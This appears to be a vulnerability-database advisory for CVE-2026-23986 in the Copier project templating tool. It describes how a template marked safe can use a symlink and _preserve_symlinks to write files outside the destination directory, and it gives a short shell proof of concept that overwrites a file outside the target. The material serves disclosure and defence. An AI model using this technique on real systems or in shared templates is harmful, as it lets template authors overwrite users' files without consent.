CVE-2026-23986 is a low severity vulnerability with a CVSS score of 0.0. No known exploits currently, and patches are available.
Very low probability of exploitation
EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.
Copier suggests that it's safe to generate a project from a safe template, i.e. one that doesn't use unsafe features like custom Jinja extensions which would require passing the --UNSAFE,--trust flag. As it turns out, a safe template can currently write to arbitrary directories outside the destination path by using directory a symlink along with _preserve_symlinks: true and a generated directory structure whose rendered path is inside the symlinked directory. This way, a malicious template author can create a template that overwrites arbitrary files (according to the user's write permissions), e.g., to cause havoc.
[!NOTE]
At the time of writing, the exploit is non-deterministic, as Copier walks the template's file tree using
os.scandirwhich yields directory entries in arbitrary order.
Reproducible example (may or may not work depending on directory entry yield order):
mkdir other/
pushd other/
echo "sensitive" > sensitive.txt
popd
mkdir src/
pushd src/
ln -s ../other other
echo "overwritten" > "{{ pathjoin('other', 'sensitive.txt') }}.jinja"
echo "_preserve_symlinks: true" > copier.yml
tree .
# .
# ├── copier.yml
# ├── other -> ../other
# └── {{ pathjoin('other', 'sensitive.txt') }}.jinja
#
# 1 directory, 2 files
popd
uvx copier copy --overwrite src/ dst/
cat other/sensitive.txt
# overwritten
n/a
n/a
n/a
Please cite this page when referencing data from Strobes VI. Proper attribution helps support our vulnerability intelligence research.